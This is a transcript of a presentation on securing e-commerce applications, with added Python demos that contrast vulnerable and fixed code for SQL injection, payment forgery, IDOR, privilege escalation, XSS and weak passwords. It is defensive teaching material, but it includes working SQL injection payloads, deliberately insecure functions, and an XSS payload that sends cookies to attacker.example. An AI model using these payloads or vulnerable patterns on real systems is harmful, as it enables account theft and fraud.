E-commerce application security
Transcript of E-commerce application security
E-commerce Application Security
Ways to secure your application from hackers
Building software is easy; building secure software is difficult. Vulnerabilities are inevitable, getting hacked is not.
What is it all about?
• Importance of security in e-commerce
• Major attacks on e-commerce applications
• Common issues and vulnerabilities in applications
• What makes attackers target your application?
• Vulnerabilities that might be present in your application
• How do hackers attack your application?
• Dos and don'ts to improve application security
You can also view a recorded session of this presentation here!
How does security affect e-commerce?
• Tarnishes the company's reputation in public
• Huge financial loss from post-breach activities such as customer notification, patching and lost business
• One breach invites many other attackers
• Loss of customers' trust
• Loss of business
Ecommerce Hacks
What do eBay, Zappos (Amazon), Domino's and Starbucks have in common?
They all suffered huge data breaches in the last few years. For more info, check out: Link
eBay Data Breach
• Attackers compromised a small number of employee log-in credentials, which gave them unauthorized access to eBay's corporate network
• The attackers obtained user information such as dates of birth, names, email addresses, phone numbers, residential addresses and (encrypted) passwords
Lessons to learn from this hack:
• Centralize application management
• Secure employees' personal accounts
• Ensure a strong password policy
• Take a proactive stand on security
Starbucks Data Breach
• The Starbucks mobile app was hacked twice within a few months
• Hackers stole money from several Starbucks customers by gaining access to their linked payment cards
• Criminals used compromised Starbucks accounts to draw on consumers' linked credit cards, stealing hundreds of dollars in a matter of minutes
Lessons to learn from this hack:
• Secure the mobile application and its backend API
• Take proactive measures against cyber attacks, such as penetration testing and vulnerability assessments
Commonly Exploited Vulnerabilities
• Injection attacks such as SQL injection, which lead to critical data loss
• Improper implementation of the payment system and logical vulnerabilities (X0RC0NF presentation: Link)
• Insecure mobile application and backend API server
• Insecure direct object reference: unrestricted access to resources such as pages, files or subdomains
• Privilege escalation and authorization bypass
• Cross-site scripting: hijacking accounts
• Improper policy implementation, such as weak passwords and insecure storage
Injection Attacks
Injection attacks can result in data loss or corruption, lack of accountability, denial of access or complete host takeover. The root cause is untrusted input being concatenated into a query or command instead of being passed as a parameter.
For example, SQL injection may lead to total compromise of your database.
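To show what the concatenation mistake looks like next to the fix, here is an added example (not code from the original presentation): a login lookup written two ways against a constructed in-memory SQLite table. The `admin' --` payload comments out the password check, and the `' OR '1'='1` tautology dumps every row; the parameterised version returns nothing for both.

```python
import sqlite3


# Constructed in-memory user table for the demo (added example, not from the original page).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [
            ("alice", "hash-of-alice-pw", "customer"),
            ("bob", "hash-of-bob-pw", "customer"),
            ("admin", "hash-of-admin-pw", "admin"),
        ],
    )
    return conn


def login_vulnerable(conn, username, password_hash):
    """Builds the SQL text by string concatenation: whatever the user types is parsed as SQL."""
    query = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password_hash):
    """Parameterised query: the driver binds the values, so they can never change the query structure."""
    query = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchall()


def demo():
    conn = build_db()
    # Payload 1: comment out the password check and log in as admin without a password.
    comment_payload = "admin' --"
    # Payload 2: a tautology that makes the WHERE clause true for every row (dumps the table).
    tautology = "' OR '1'='1"
    return {
        "vuln_admin_bypass": login_vulnerable(conn, comment_payload, "wrong"),
        "vuln_dump_all": login_vulnerable(conn, tautology, tautology),
        "safe_admin_bypass": login_safe(conn, comment_payload, "wrong"),
        "safe_dump_all": login_safe(conn, tautology, tautology),
        "safe_legit": login_safe(conn, "alice", "hash-of-alice-pw"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The same rule applies to every other interpreter the application talks to (shell commands, LDAP filters, NoSQL queries): pass data through the driver's binding mechanism, never through string formatting.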
Payment system and logical vulnerabilities
Payment gateways are often found to be insecurely implemented, which may lead to attacks such as payment forgery or restriction bypass. A typical cause is that the server trusts the amount or payment status reported by the client or relayed through the browser instead of recomputing and verifying it.
Logical vulnerabilities are hard to discover but have a huge impact on business.
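An added example of the payment-forgery point (not code from the presentation; the HMAC callback scheme, the shared secret and the catalogue are assumptions for illustration): a payment-confirmation handler that trusts the relayed status, next to one that checks the gateway signature, recomputes the order total from server-side prices and refuses replays.

```python
import hashlib
import hmac
from decimal import Decimal

# Hypothetical shared secret between the shop and its payment gateway (assumption for the example).
GATEWAY_SECRET = b"shop-gateway-shared-secret"

# Constructed catalogue: prices live on the server, never in the checkout form.
CATALOG = {"sku-100": Decimal("49.99"), "sku-200": Decimal("5.00")}

# Order IDs whose payment has already been accepted (replay protection).
PROCESSED = set()


def order_total(cart):
    """Recompute the amount due from server-side prices and the quantities in the cart."""
    return sum((CATALOG[sku] * qty for sku, qty in cart.items()), Decimal("0"))


def sign_callback(params):
    """HMAC-SHA256 over the sorted key=value pairs, as an assumed gateway would compute it."""
    message = "&".join(f"{k}={params[k]}" for k in sorted(params)).encode()
    return hmac.new(GATEWAY_SECRET, message, hashlib.sha256).hexdigest()


def confirm_payment_vulnerable(order, callback):
    """Trusts the status and amount the browser relays from the gateway: forgeable by the customer."""
    if callback.get("status") == "success":
        order["paid"] = Decimal(callback["amount"])
        return True
    return False


def confirm_payment_safe(order, callback):
    """Verify signature, order id, currency and the server-recomputed amount, and reject replays."""
    supplied_sig = callback.get("sig", "")
    unsigned = {k: v for k, v in callback.items() if k != "sig"}
    if not hmac.compare_digest(sign_callback(unsigned), supplied_sig):
        return False, "bad signature"
    if callback.get("status") != "success":
        return False, "payment not successful"
    if callback.get("order_id") != order["id"]:
        return False, "order id mismatch"
    if callback.get("currency") != order["currency"]:
        return False, "currency mismatch"
    expected = order_total(order["cart"])
    if Decimal(callback.get("amount", "0")) != expected:
        return False, f"amount {callback.get('amount')} does not match order total {expected}"
    if order["id"] in PROCESSED:
        return False, "duplicate callback"
    PROCESSED.add(order["id"])
    order["paid"] = expected
    return True, "ok"


def demo():
    order = {"id": "ord-1001", "currency": "EUR", "cart": {"sku-100": 1, "sku-200": 2}}  # total 59.99
    # Forged callback: the customer rewrites amount and status in the redirect back to the shop.
    forged = {"order_id": "ord-1001", "status": "success", "amount": "0.01", "currency": "EUR", "sig": "deadbeef"}
    # Genuine callback signed by the gateway for the right amount.
    genuine = {"order_id": "ord-1001", "status": "success", "amount": "59.99", "currency": "EUR"}
    genuine["sig"] = sign_callback(genuine)
    # Tampered checkout: the amount posted to the gateway was lowered before paying, so the
    # gateway signs a perfectly valid receipt for the wrong amount.
    underpaid = {"order_id": "ord-1001", "status": "success", "amount": "5.00", "currency": "EUR"}
    underpaid["sig"] = sign_callback(underpaid)
    return {
        "vuln_accepts_forged": confirm_payment_vulnerable(dict(order), forged),
        "safe_rejects_forged": confirm_payment_safe(dict(order), forged),
        "safe_rejects_underpaid": confirm_payment_safe(dict(order), underpaid),
        "safe_accepts_genuine": confirm_payment_safe(dict(order), genuine),
        "safe_rejects_replay": confirm_payment_safe(dict(order), genuine),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The underpaid case is the one a signature check alone misses: the receipt is authentic, but for an amount the customer chose. Comparing against a total recomputed from server-side prices is what closes it.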
Insecure mobile application and backend API server
Protecting only the web application from hackers is not sufficient.
With the increased use of smartphones and tablets, the internet is flooded with mobile applications. These applications must also be secured, together with the backend API calls they make: an attacker can call the API directly without ever going through the app, so every check must live on the server.
Insecure direct object reference
Insecure direct object reference means referencing an object such as a page, a file or a database record directly, by an identifier the user controls, without checking that the user is allowed to access it.
Such insecure entry points are often discovered in applications while performing a pentest.
Privilege Escalation and authorization bypass
Privilege escalation enables the attacker to compromise a user's account by accessing resources that are meant to be private.
If the compromised account is that of an administrator, the attacker now controls the admin functionality.
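The insecure direct object reference and privilege escalation sections above describe two faces of the same missing check, so one added example (not code from the presentation; the users, orders and endpoint names are constructed for illustration) covers both: an order lookup that returns whatever id the caller supplies, a role-change endpoint that assumes only admins reach it, and the server-side ownership and role checks that fix them.

```python
# Constructed sample data (added example, not from the original page).
USERS = {
    "u-1": {"role": "customer"},
    "u-2": {"role": "customer"},
    "u-9": {"role": "admin"},
}
ORDERS = {
    "1001": {"owner": "u-1", "items": ["sku-100"], "shipping_address": "1 Alice Lane"},
    "1002": {"owner": "u-2", "items": ["sku-200"], "shipping_address": "2 Bob Street"},
}


class Forbidden(Exception):
    """Raised when the caller is not allowed to reach the object or perform the action."""


def get_order_vulnerable(order_id):
    """IDOR: /orders/<id> returns whatever id the caller types, with no ownership check."""
    return ORDERS[order_id]


def get_order_safe(requester_id, order_id):
    """Look the object up, then check that it belongs to the caller (or the caller is an admin)."""
    order = ORDERS.get(order_id)
    if order is None:
        raise Forbidden("not found")  # same error for missing and foreign ids: no enumeration oracle
    if order["owner"] != requester_id and USERS[requester_id]["role"] != "admin":
        raise Forbidden("not found")
    return order


def set_role_vulnerable(actor_id, target_id, role):
    """Authorization bypass: the endpoint trusts that only admins ever call it."""
    USERS[target_id]["role"] = role
    return USERS[target_id]["role"]


def set_role_safe(actor_id, target_id, role):
    """Privileged action: check the caller's role on the server, on every request."""
    if USERS[actor_id]["role"] != "admin":
        raise Forbidden("admin only")
    USERS[target_id]["role"] = role
    return USERS[target_id]["role"]


def demo():
    results = {}
    # u-1 reads u-2's order just by changing the id in the URL.
    results["idor_leak"] = get_order_vulnerable("1002")["shipping_address"]
    try:
        get_order_safe("u-1", "1002")
        results["idor_fixed"] = "leaked"
    except Forbidden:
        results["idor_fixed"] = "blocked"
    results["owner_ok"] = get_order_safe("u-1", "1001")["shipping_address"]
    results["admin_ok"] = get_order_safe("u-9", "1002")["shipping_address"]
    # u-1 tries to promote itself to admin.
    try:
        set_role_safe("u-1", "u-1", "admin")
        results["privesc_fixed"] = "escalated"
    except Forbidden:
        results["privesc_fixed"] = "blocked"
    results["privesc_vuln"] = set_role_vulnerable("u-1", "u-1", "admin")
    USERS["u-1"]["role"] = "customer"  # reset the demo data
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Returning the same "not found" for a missing id and for someone else's id matters in practice: a distinct "forbidden" response tells the attacker which ids exist.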
Cross Site Scripting
Attackers can execute scripts in a victim's browser to hijack user sessions and steal cookies.
This is one of the most common attack vectors used to steal credentials and tokens and to perform targeted attacks.
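An added example for the cross-site scripting point (not code from the presentation; the review page fragment, the payload and the attacker host are constructed): a product review rendered straight into HTML next to the escaped version, plus the cookie flags that keep a session token out of `document.cookie` even if a script does run.

```python
import html
import re

# Constructed review submitted by an attacker (example payload, not from the original page).
PAYLOAD = "Great shoes!<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"

PAGE = '<div class="review"><p>{body}</p></div>'


def render_review_vulnerable(body):
    """Interpolates the user's text straight into the HTML: the victim's browser runs the script."""
    return PAGE.format(body=body)


def render_review_safe(body):
    """Escapes the HTML metacharacters (& < > " '), so the payload is displayed, not executed."""
    return PAGE.format(body=html.escape(body, quote=True))


def session_cookie_header(token):
    """HttpOnly keeps the cookie out of document.cookie; Secure and SameSite limit where it is sent."""
    return f"Set-Cookie: session={token}; Path=/; HttpOnly; Secure; SameSite=Lax"


def contains_active_script(page_html):
    """Crude check used by the demo: does the page contain a live <script> tag?"""
    return re.search(r"<script\b", page_html, re.IGNORECASE) is not None


def demo():
    return {
        "vuln": render_review_vulnerable(PAYLOAD),
        "safe": render_review_safe(PAYLOAD),
        "cookie": session_cookie_header("constructed-session-token"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

`html.escape` is the right encoding for text placed inside an element body or a quoted attribute; text placed inside a script block, a URL or a CSS value needs the encoding for that context instead. Prefer a template engine that escapes by default over hand-written escaping.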
Improper Policy implementations- A Weak Password
A weak password policy that allows users to set weak passwords makes the application vulnerable to attacks such as brute force and password guessing.
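An added example for the weak-password point (not code from the presentation; the denylist, minimum length and lockout numbers are assumptions for illustration): a policy check that rejects short, common and username-derived passwords, and a per-account throttle that locks out after repeated failures so guessing does not scale. The demo drives the throttle with a fake clock so it runs offline.

```python
import time

# Constructed denylist of common passwords; a real deployment would check a breached-password list.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "welcome1", "letmein", "admin123"}

MIN_LENGTH = 12  # assumed policy value


def password_policy_errors(password, username=""):
    """Return the list of policy violations; an empty list means the password is acceptable."""
    errors = []
    if len(password) < MIN_LENGTH:
        errors.append(f"shorter than {MIN_LENGTH} characters")
    if password.lower() in COMMON_PASSWORDS:
        errors.append("in the common-password denylist")
    if username and username.lower() in password.lower():
        errors.append("contains the username")
    if len(set(password)) < 4:
        errors.append("too few distinct characters")
    return errors


class LoginThrottle:
    """Per-account failed-attempt counter with a lockout window, to slow brute force and guessing."""

    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self._failures = {}  # username -> (failure count, time of last failure)

    def is_locked(self, username):
        count, last = self._failures.get(username, (0, 0.0))
        if count < self.max_failures:
            return False
        if self.clock() - last >= self.lockout_seconds:
            del self._failures[username]  # lockout window has expired
            return False
        return True

    def record_failure(self, username):
        count, _ = self._failures.get(username, (0, 0.0))
        self._failures[username] = (count + 1, self.clock())

    def record_success(self, username):
        self._failures.pop(username, None)


def demo():
    clock = [0.0]  # fake clock so the lockout expiry can be exercised without sleeping
    throttle = LoginThrottle(max_failures=3, lockout_seconds=60, clock=lambda: clock[0])
    for _ in range(3):
        throttle.record_failure("alice")
    locked_now = throttle.is_locked("alice")
    clock[0] += 61
    locked_later = throttle.is_locked("alice")
    return {
        "weak": password_policy_errors("password", "alice"),
        "strong": password_policy_errors("correct-horse-battery-staple", "alice"),
        "locked_now": locked_now,
        "locked_later": locked_later,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

A per-account lockout on its own can be turned into a denial of service against your own users, so pair it with per-source rate limiting and a proper password hash (bcrypt, scrypt or Argon2) so that offline guessing against a stolen database is slow as well.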
Hacker’s Jackpot
• Credit card data and personal information such as phone numbers and addresses can be sold on the black market
• Personal information can be used for blackmail and phishing
• An unencrypted database can be sold very easily to competitors
“If you're a @dominos_pizzafr customer, u may want to know that we have offered Domino's not to publish your data in exchange for €30,000,”
-Tweet by hackers after Dominos Hack
Financial services are amongst the top 3 most attacked services on the internet
-2015-DBIR (Verizon)
What do hackers look for?
• Unpatched servers or network devices
• Insecure, vulnerable implementations of known software such as WordPress
• Older or outdated software with publicly available exploits
• Common vulnerabilities such as CSRF, XSS, lack of HTTPS, brute-forcing etc.
• Subdomains without proper authorization, or publicly exposed sensitive data
“In our experience, 30-45% of applications have one or more critical vulnerabilities.”
47% of all breaches in the 2015 study were caused by malicious or criminal attacks.
-DBIR (Verizon)
How do hackers attack?
• Choosing the weakest link to attack: the web application, unpatched servers, employee credentials etc.
• Finding a vulnerability in the web application to steal user credentials, and exploiting it
• A single XSS on any page may lead to admin account compromise
• Searching for vulnerable installations of known software such as WordPress or Magento
• Hacking a weak WordPress blog is far easier than hacking the main website itself
• Data exfiltration is done in stealth mode
Safeguarding
• Proactively discover and remediate application vulnerabilities in a timely manner
• A good penetration test will also discover logical vulnerabilities and authorization issues
• Make sure to assess all subdomains, servers and accessible portals. A resource is not hidden just because you have not linked to it: a simple Google search such as “site:xyz.com -www” will reveal many subdomains
• Ensure strong encryption and policies are implemented on the application and the network
• Easy-to-find vulnerabilities (XSS, CSRF, file uploads etc.) cause the most damage if left unfixed
• Always audit the application server together with the web application
• Mobile applications are becoming an easy target for hackers; make sure to assess them for vulnerabilities
It might be dark, but the light is not very far